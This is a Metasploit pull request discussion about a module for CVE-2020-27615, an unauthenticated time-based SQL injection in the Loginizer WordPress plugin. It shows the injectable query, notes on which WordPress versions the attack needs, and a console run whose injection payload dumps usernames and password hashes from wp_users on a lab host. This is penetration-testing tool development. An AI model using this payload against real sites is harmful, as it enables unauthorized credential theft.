### PR TITLE
wp_Loginizer unauth sqli (CVE-2020-27615)

### PR DESCRIPTION
**Pull request by h00die**
This is a WIP for the wordpress plugin loginizer <=1.6.3 unauth sqli.

Currently the `list users` action works, the `create admin` stuff is untested and most likely broken as i just pasted some code to look at later.  I'm also looking at extending the functionality out to possibly be a full exploit module instead of an aux.  However, wanted to give a good working space for @red0xff to work with.

Mad props goes out to @red0xff and their sqli libs, as well as support on getting this module working just right.

### CODE REVIEW

**Comment by red0xff** [comment]
Awesome work @h00die , thanks a lot.

Not sure if this vulnerability can be leveraged to add an Administrator user, following [this detailed explaination](https://wpdeeply.com/loginizer-before-1-6-4-sqli-injection/), the SQLi happens in an INSERT statement, executed with `$wpdb->query`, which calls `mysql_query()`, which does not support stacked queries.

The vulnerable parameter we control is `username`, the query looks like this:
`INSERT INTO ".$wpdb->prefix."loginizer_logs SET username = '".$username."', time = '".time()."', count = '1', ip = '".$loginizer['current_ip']."', lockout = '0', url = '".$url."';`

I am not aware of a way to insert into another table using the above vulnerability.

(And about the usage of the library, if stacked queries were supported, one would use the `raw_run_sql` to run an insert, otherwise, the library will be querying on the time-based blind manner, also, the block would need to place the payload after a semicolon at the end of the query).

**Review by cdelafuente-r7 — COMMENTED** [review]
Thanks @h00die for this module! I tested it against Loginizer version 1.6.3 and it works great. I just left a few comments about a possible `NoMethodError` exception and minimum Wordpress for the exploit to work. I spend some time debugging it and found older Wordpress escaped single quotes, which prevent the exploit to work.

File: documentation/modules/auxiliary/scanner/http/wp_loginizer_log_sqli.md [hunk 1]
```diff
@@ -0,0 +1,70 @@
+## Vulnerable Application
+
+Loginizer wordpress plugin contains an unauthenticated timebased SQL injection in
+versions before 1.6.4.  The vulnerable parameter is in the `log` parameter.
+
```
[the remark this answers is not in the document]
Comment (h00die) [reply documentation/modules/auxiliary/scanner/http/wp_loginizer_log_sqli.md:5]: The `username` field isn't used in the query. my test/dev box for this was 5.4.2 where it worked fine.

[the remark this answers is not in the document]
Comment (cdelafuente-r7) [reply documentation/modules/auxiliary/scanner/http/wp_loginizer_log_sqli.md:5]: Sorry, I meant the field that contains the username, which is `log` here.

Also, I was wrong about the exact Wordpress versions. The `wp_unslash()` in `wp-includes/user.php ` was [added](https://github.com/WordPress/WordPress/commit/a87271af60113d46ab3866b1e525a1817bce742d#diff-05003928101dd60650a6864173792d6fbaaccbd26820d99dbcfff47c5f61322e) to 5.4 and 5.5 branches. I need to review my git skills :)
```
$ git tag --contains a87271af60113d46ab3866b1e525a1817bce742d
5.4
5.4.1
5.4.2
5.4.3
5.4.4
5.5
5.5.1
5.5.2
5.5.3
```
So, the recommendation would be `>= 5.4.x` and `>= 5.5.x`.

**Comment by cdelafuente-r7** [comment]
Thanks for the updates @h00die. It looks good to me.
I tested against Loginizer v1.6.3 on WordPress v5.5.3 and verified the credentials where correctly extracted and stored into the database. I'll go ahead and land it.

```
msf6 > use auxiliary/scanner/http/wp_loginizer_log_sqli
msf6 auxiliary(scanner/http/wp_loginizer_log_sqli) > set RHOSTS 127.0.0.1
RHOSTS => 127.0.0.1
msf6 auxiliary(scanner/http/wp_loginizer_log_sqli) > set RPORT 7070
RPORT => 7070
msf6 auxiliary(scanner/http/wp_loginizer_log_sqli) > set COUNT 3
COUNT => 3
msf6 auxiliary(scanner/http/wp_loginizer_log_sqli) > set verbose true
verbose => true
msf6 auxiliary(scanner/http/wp_loginizer_log_sqli) > show options

Module options (auxiliary/scanner/http/wp_loginizer_log_sqli):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   COUNT      3                no        Number of users to enumerate
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     127.0.0.1        yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      7070             yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                yes       The base path to the wordpress application
   THREADS    1                yes       The number of concurrent threads (max one per host)
   VHOST                       no        HTTP server virtual host


Auxiliary action:

   Name        Description
   ----        -----------
   List Users  Queries username, password hash for COUNT users


msf6 auxiliary(scanner/http/wp_loginizer_log_sqli) > run

[*] Checking /wp-content/plugins/loginizer/readme.txt
[*] Found version 1.6.3 in the plugin
[+] Vulnerable version detected
[*] {SQLi} Executing (select group_concat(jqoXYn) from (select cast(concat_ws(';',ifnull(user_login,''),ifnull(user_pass,'')) as binary) jqoXYn from wp_users limit 3) sJTRdd)
[*] {SQLi} Time-based injection: expecting output of length 119
[+] wp_users
========

 user_login  user_pass
 ----------  ---------
 Test        $P$BDVBQHB.Yn4SWi3xnJJJjDI73uijcw/
 admin       $P$BxjYyClYCp1FSEQirVr7NMUojnK8dK0
 msf         $P$BL3SexzPfat8KylRTPjd6Snq3uO0mT0

[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/http/wp_loginizer_log_sqli) > creds
Credentials
===========

host  origin     service  public  private                             realm  private_type        JtR Format
----  ------     -------  ------  -------                             -----  ------------        ----------
      127.0.0.1           admin   $P$BxjYyClYCp1FSEQirVr7NMUojnK8dK0         Nonreplayable hash  phpass
      127.0.0.1           Test    $P$BDVBQHB.Yn4SWi3xnJJJjDI73uijcw/         Nonreplayable hash  phpass
      127.0.0.1           msf     $P$BL3SexzPfat8KylRTPjd6Snq3uO0mT0         Nonreplayable hash  phpass
```

**Comment by cdelafuente-r7** [comment]
# Release Notes
This module allow you to exploit an unauthenticated SQL injection in Loginizer WordPress plugin versions before 1.6.4 and extract user's credentials as stored in the database (hashes). This vulnerability is identified as CVE-2020-27615. Note that exploitation requires Wordpress 5.4 (or newer) or 5.5 (or newer).

**Pull request merged**